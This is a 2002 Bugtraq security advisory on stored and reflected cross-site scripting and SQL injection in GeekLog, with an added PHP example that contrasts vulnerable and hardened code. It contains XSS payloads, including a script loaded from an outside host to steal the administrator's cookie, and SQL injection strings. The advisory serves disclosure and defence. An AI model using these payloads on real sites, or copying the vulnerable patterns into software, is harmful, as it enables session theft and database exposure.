[25700] in bugtraq
[ARL02-A13] Multiple Security Issues in GeekLog
daemon@ATHENA.MIT.EDU (Ahmet Sabri ALPER)
Mon Jun 10 11:43:28 2002
Date: 10 Jun 2002 11:41:43 -0000
Message-ID: <20020610114143.18205.qmail@mail.securityfocus.com>
From: Ahmet Sabri ALPER <s_alper@hotmail.com>
To: bugtraq@securityfocus.com
+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A13 ----/----------/+
+/-----------\----- salper@olympos.org ---/-----------/+
Advisory Information
--------------------
Name : Multiple Security Issues in GeekLog
Software Package : GeekLog
Vendor Homepage : http://geeklog.sourceforge.net/
Vulnerable Versions: v1.3.5, v1.3.5rc1 and older
Platforms : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted : 31/05/2002
Vendor Replied : 01/06/2002
Prior Problems : N/A
Current Version : v1.3.5rc1 (vulnerable)
Summary
-------
GeekLog is a web content management system suitable for
running full-featured community sites. It supports article
posting, threaded comments, event scheduling, and link
management and is built around a design philosophy that
emphasizes ease of use.
I have found these issues while testing the GeekLog system
which was to be used at http://www.olympos.org, "Olympos
Turkish Security Portal".
Two different Cross Site Scripting issues (one stored, one reflected) plus
one SQL Injection vulnerability were found in GeekLog.
Details
-------
1. When any user submits a new Calendar Event, the form is sent to the
site administrator for approval. The $url variable, which holds the data
entered in the "Link" field of the form, is not filtered for malicious
code before it is displayed to the administrator. A malicious user can
therefore steal the cookie of the site administrator and effectively
"own" the site.
The same issue can be used to run attacker-supplied script in the
context of the GeekLog site for anyone who views the event.
Proof-of-concept Link input ($url):
<script src="http://forum.olympos.org/f.js">Alper</script>
2. Maliciously crafted links from third-party sites allow reflected Cross
Site Scripting attacks via "index.php" and "comment.php", because the
$topic and $title parameters are echoed back into the page without being
encoded. Two examples of this:
/index.php?topic=<script>alert(document.cookie)</script>
/comment.php?mode=display&sid=foo&pid=18&title=<script>alert(document.cookie)</script>&type=article
3. The $pid variable is passed directly into an SQL query. This makes it
possible for attackers to launch SQL injection attacks:
/comment.php?mode=display&sid=foo&pid=PROBLEM_HERE&title=ALPER_Research_Labs
Because PHP's "Magic Quotes" feature (magic_quotes_gpc) backslash-escapes
quote characters in request data, this third issue may only cause "light"
headaches on a default installation, but if Magic Quotes is not active the
attacker may be able to read all the information about users from the SQL
tables. Note that magic_quotes_gpc only escapes single quotes, double
quotes, backslashes and NUL bytes; it does nothing for a value that is
interpolated into a numeric position of a query, so it must not be relied
on as a fix.
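The following is an added example, not part of the original advisory and not GeekLog's own code. It reproduces the three input-validation patterns described in issues 1 to 3 in PHP and places a hardened version beside each: URL scheme allow-listing plus HTML encoding for the stored event link, the same encoding for the reflected parameters, and an integer check plus a typed bound parameter for $pid. The variable names $url, $topic/$title and $pid come from the advisory; the table name "comments", the column name "pid", the helper function names and the use of mysqli prepared statements are assumptions made for the illustration.

```php
<?php
// Added example, not GeekLog code. Assumptions (not from the advisory):
// comments live in a table named "comments" with a numeric "pid" column;
// helper names (h, safe_event_link, ...) are the editor's own.

// HTML-encode anything echoed into a page. This alone neutralises the
// <script> payloads of issues 1 and 2 wherever the value is *displayed*.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Issue 1: the event link is attacker-controlled and lands in an <a href>
// viewed by the administrator. Encoding is not enough for an href (a
// "javascript:" URL survives htmlspecialchars), so also allow-list the scheme.
function safe_event_link(string $raw): ?string
{
    $url = trim($raw);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

function render_event_vulnerable(string $url, string $title): string
{
    return "<a href=\"$url\">$title</a>";          // raw: the script runs for the admin
}

function render_event_hardened(string $url, string $title): string
{
    $link = safe_event_link($url);
    if ($link === null) {
        return '<span>' . h($title) . '</span>';  // bad link: drop it, keep the text
    }
    return '<a href="' . h($link) . '">' . h($title) . '</a>';
}

// Issue 3: $pid goes into SQL. In "WHERE pid = $pid" there are no quotes
// around the value, so magic_quotes_gpc (which only backslash-escapes
// ' " \ and NUL) leaves "18 OR 1=1" untouched.
function comments_sql_vulnerable(string $pid): string
{
    return "SELECT * FROM comments WHERE pid = $pid";
}

// Hardened: require a plain integer before the value gets near the query,
// and bind it as a typed parameter instead of interpolating it.
function comments_fetch(mysqli $db, string $pid): ?array
{
    if (!ctype_digit($pid)) {                     // rejects "18 OR 1=1", "", "-1"
        return null;                              // caller answers with an error page
    }
    $id   = (int) $pid;
    $stmt = $db->prepare('SELECT * FROM comments WHERE pid = ?');
    $stmt->bind_param('i', $id);                  // 'i': bound as an integer
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC); // get_result() needs mysqlnd
}

// Constructed inputs modelled on the proof-of-concept values in the advisory.
$evil_url   = '<script src="http://forum.olympos.org/f.js">Alper</script>';
$evil_title = '<script>alert(document.cookie)</script>';

echo render_event_vulnerable($evil_url, $evil_title), "\n";   // live <script> tag
echo render_event_hardened($evil_url, $evil_title), "\n";     // inert text
echo render_event_hardened('javascript:alert(1)', 'x'), "\n"; // link dropped
echo render_event_hardened('http://www.olympos.org/', 'Olympos'), "\n";

// Issue 2: the reflected $topic / $title values get the same encoding.
$topic = $evil_title;
echo '<h2>' . h($topic) . '</h2>', "\n";

// Issue 3: each payload below is valid SQL when interpolated; only "18" passes
// the integer check used by comments_fetch().
foreach (['18', '18 OR 1=1', '18 UNION SELECT 1,2,3'] as $pid) {
    echo comments_sql_vulnerable($pid), "\n";
    echo ctype_digit($pid) ? "accepted: $pid" : "rejected: $pid", "\n";
}
```

The integer check is the important part for issue 3: a value that must be a row id should never reach the query as text, with or without magic quotes, and the bound parameter makes the database treat it as data rather than SQL.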
Solution
--------
The vendor replied and acted quickly.
A patch or a new version addressing these issues will
soon be available via CVS or as an FTP download from:
http://www.sourceforge.net/projects/geeklog
or
http://geeklog.sourceforge.net
The GeekLog development team said that they will also be
auditing the code for further security issues similar to
those mentioned above.
Credits
-------
Discovered on 31, May, 2002 by
Ahmet Sabri ALPER <salper@olympos.org>
ALPER Research Labs.
The ALPER Research Labs [ARL] workers are freelance
security professionals and WhiteHat hackers. The ARL
workers are available for hire for legal work.
ARL also supports the Open Software community by finding
possible security issues in GPL or other publicly licensed
products.
References
----------
Product Web Page: http://geeklog.sourceforge.net/
Olympos: http://www.olympos.org/